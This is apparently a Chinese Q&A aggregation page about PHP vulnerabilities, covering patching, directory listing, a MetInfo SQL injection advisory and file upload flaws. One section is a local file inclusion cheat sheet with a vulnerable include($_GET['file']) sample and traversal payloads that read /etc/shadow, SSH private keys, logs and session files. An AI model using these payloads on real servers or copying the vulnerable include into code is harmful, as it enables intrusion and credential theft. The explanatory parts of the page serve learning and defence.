phpgetfile漏洞

‘壹’ php漏洞修复

打开php配置文件，php.ini，然后在里面搜索dll，把你下载的布丁照着格式复制一行就行了。比如你下载的补丁为abc.dll;就加一行extension=abc.dll

‘贰’ PHP 检查漏洞工具显示“网站目录结构暴露”

网站存在目录浏览漏洞：关闭Web容器（如IIS/Apache等）的目录浏览功能，比如：

1.IIS中关闭目录浏览功能：在IIS的网站属性中，勾去“目录浏览”选项，重启IIS；
2.Apache中关闭目录浏览功能：打开Apache配置文件httpd.conf，查找 “Options Indexes FollowSymLinks”，修改为“ Options -Indexes”(减号表示取消)，保存退出，重启Apache。

具体看这个http://zhanzhang..com/college/courseinfo?id=267&page=14#03

‘叁’ 计算机扫描出php漏洞如何处理

系统漏洞是指应用软件或操作系统软件在逻辑设计上的缺陷或在编写时产生的错误，这个缺陷或错误可以被不法者或者电脑黑客利用，通过植入木马、病毒等方式来攻击或控制整个电脑，从而窃取您电脑中的重要资料和信息，甚至破坏您的系统。
漏洞原理windows系统漏洞问题是与时间紧密相关的。一个windows系统从发布的那一天起，随着用户的深入使用，系统中存在的漏洞会被不断暴露出来，这些早先被发现的漏洞也会不断被系统供应商：微软公司发布的补丁软件修补，或在以后发布的新版系统中得以纠正。而在新版系统纠正了旧版本中具有漏洞的同时，也会引入一些新的漏洞和错误。
因而随着时间的推移，旧的系统漏洞会不断消失，新的系统漏洞会不断出现。系统漏洞问题也会长期存在。
安全公告
2014年2月12日凌晨，微软发布7个漏洞补丁，包括4个“严重”级别的补丁和3个“重要”级别的漏洞。分别修复了Internet Explorer、.Net、Windows中存在的多个漏洞和一个Windows8专属漏洞。
2014年1月16日，发布1月安全公告，其中4个漏洞补丁级别均为“重要”，它们分别修复了MS Office Word、Windows 7内核和旧版本Windows 内核驱动中存在的多个远程代码执行和提权漏洞。同时推送的还有Adobe Flash Player 12的版本更新安装包及Adobe Reader安全更新。
微软一般在每月第二周的周二发布安全公告，被称为“补丁星期二”。
漏洞级别
漏洞按严重程度分为“紧急”、“重要”、“警告”、“注意”四种。一般的说，在微软的网站上定义为重要的都应该及时更新。
漏洞修复
系统自动更新Update，或用电脑管家等安全软件自动修复。
希望我能帮助你解疑释惑。

‘肆’ ubuntu出现PHP安全漏洞怎么清除

这说明你这个 php 不是通过 apt 安装的。 使用 locate php 或 find . -iname php / 看看你的php安装到哪里了

‘伍’ php代码执行漏洞所能造成的危害包括以下哪些内容

假如你的 include 中包含 可变的参数，而且可悲外部修改，例如：
<?phpinclude("inc/".$_GET['file']);这样的话，就会引发漏洞，用户可以构造任意参数来读取你的文件。

‘陆’ php漏洞怎么修复

近日，我们SINE安全对metinfo进行网站安全检测发现，metinfo米拓建站系统存在高危的sql注入漏洞，攻击者可以利用该漏洞对网站的代码进行sql注入攻击，伪造恶意的sql非法语句，对网站的数据库，以及后端服务器进行攻击，该metinfo漏洞影响版本较为广泛，metinfo6.1.0版本，metinfo 6.1.3版本，metinfo 6.2.0都会受到该网站漏洞的攻击。

metinfo建站系统使用的PHP语言开发，数据库采用的是mysql架构开发的，在整体的网站使用过程中，简单易操作，可视化的对网站外观进行设计，第三方API接口丰富，模板文件较多，深受企业网站的青睐，建站成本较低可以一键搭建网站，目前国内使用metinfo建站的网站数量较多，该metinfo漏洞会使大部分的网站受到攻击影响，严重的网站首页被篡改，跳转到其他网站，以及网站被劫持跳转到恶意网站上，包括网站被挂马，快照被劫持等情况都会发生。

关于该metinfo漏洞的分析，我们来看下漏洞产生的原因：

该漏洞产生在member会员文件夹下的basic.php代码文件：

metinfo独有的设计风格，使用了MVC框架进行设计，该漏洞的主要点在于使用了auth类的调用方式，在解码加密过程的算法中出现了问题，我们再来看下代码：

通常加密，以及解密的算法是不可以可逆的，但是metinfo写的代码可以进行伪造函数值进行逆算，我们看这个构造的恶意函数，这里的key值是从前端met_webkeys值里进行获取，将获取到的webkeys值进行写入，并赋值到配置文件里，config目录下的config_safe.php代码里。我们通过查看这个代码，发现写入的值没有办法进行PHP脚本的执行，本来以为可是伪造key值进行写入木马，发现行不通，但是在这个伪造key值的过程可以进行sql注入攻击，采用是延时注入方式进行

关于metinfo漏洞的修复建议，以及安全方案

目前metinfo最新版本发布是2019年3月28日，6.2.0版本，官方并没有针对此sql注入漏洞进行修复，建议网站的运营者对网站的后台地址进行更改，管理员的账号密码进行更改，更改为数字+字符+大小写的12位以上的组合方式，对网站的配置文件目录进行安全限制，去掉PHP脚本执行权限，如果自己对代码不是太熟悉，建议找专业的网站安全公司来处理修复漏洞，国内SINE安全，以及绿盟，启明星辰，都是比较不错的网站漏洞修复公司。

‘柒’ php文件包含漏洞可能造成的危害有哪些

在接下来的内容中会以代码样本作为例子，来给大家介绍各种奇葩猥琐的利用姿势。
0x01 普通本地文件包含

1

<?php
include("inc/"

. $_GET['file']);
?>

包含同目录下的文件：
?file=.htaccess
目录遍历：
?file=../../../../../../../../../var/lib/locate.db ?file=../../../../../../../../../var/lib/mlocate/mlocate.db
（Linux中这两个文件储存着所有文件的路径，需要root权限）
包含错误日志： ?file=../../../../../../../../../var/log/apache/error.log （试试把UA设置为“”来使payload进入日志）
获取web目录或者其他配置文件：
?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf
（更多→http://wiki.apache.org/httpd/DistrosDefaultLayout）
包含上传的附件：
?file=../attachment/media/xxx.file
读取session文件：
?file=../../../../../../tmp/sess_tnrdo9ub2tsrntv0pdir1no7
（session文件一般在/tmp目录下，格式为sess_[your phpsessid value]，有时候也有可能在/var/lib/php5之类的，在此之前建议先读取配置文件。在某些特定的情况下如果你能够控制session的值，也许你能够获得一个shell）
如果拥有root权限还可以试试读这些东西：
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/etc/shadow
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]* (文件标识符)
/proc/mounts
/proc/config.gz
如果有phpinfo可以包含临时文件：
参见http://hi..com/mmnwzsdvpkjovwr/item/3f7ceb39965145eea984284el

‘捌’ 文件上传漏洞如何搭建

文件上传是Web应用中比较常见的功能，用户经常会通过文件上传的功能分享照片、修改头像或上传附件等操作；文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务端命令的能力；文件上传本身是一个网站正常的业务需求，但如果文件在上传之后，服务器端没有妥善的处理，就会导致严重的后果。简单写一个php上传代码演示php上传漏洞。

1.首先搭建phpstudy的安装环境，在phpstudy网站根目录建立php演示文件夹，放入php文件上传代码。

2.php文件上传漏洞演示代码，代码未限制任何文件属性的上传。

3.

写一个phpinfo.php文件,通过浏览器访问进行上传。

4.

提示上传成功，保存于uploads路径中，可以猜想保存路径为http://10.10.10.1/php/uploads

5.

尝试访问phpinfo.php文件使用刚才猜想的路径，http://10.10.10.1/php/uploads/phpinfo.php,phpinfo函数被执行。

‘玖’ 问答：php漏洞在不升级PHP版本的情况下怎么修复

php漏洞修复的问题。我们用的php是5.6版本的，之前修复漏洞一直都是用升级php的方式，可是5.6版本今年一月发布了5.6.30之后就在没更新了，现在用绿盟检测了好几个高危漏洞，急着要修复，但是5.6版本官方还没发新包，由于7.0以上的版本我们研发说框架不适用，暂时只能用5.6的。打听了一下知道5.6已经停止更新新功能，但是还会维护到18年年底。
因为官方已经停止更新了，是不会出新包的。如果想要修复，只能把自己的版本迭代，升级到php7。物竞天择，只能狠狠心更新版本了，项目可能要大换血

‘拾’ php如何打漏洞补丁

首先那些检测漏洞的网站也别太当真，很多都是胡扯，我还遇到过开放80端口也算是高危漏洞的检测咧，按他们说的只有拔掉服务器电源才是最安全的。
另外如果真的有漏洞，那也是程序代码上的漏洞，一般不可能是php版本的漏洞，从来没听过有什么漏洞通过升级php版本就能解决的。
你是不是那这个漏洞当成了windows漏洞一样，打个补丁升个级就修复了，就算是打补丁升级，也是升级你的代码。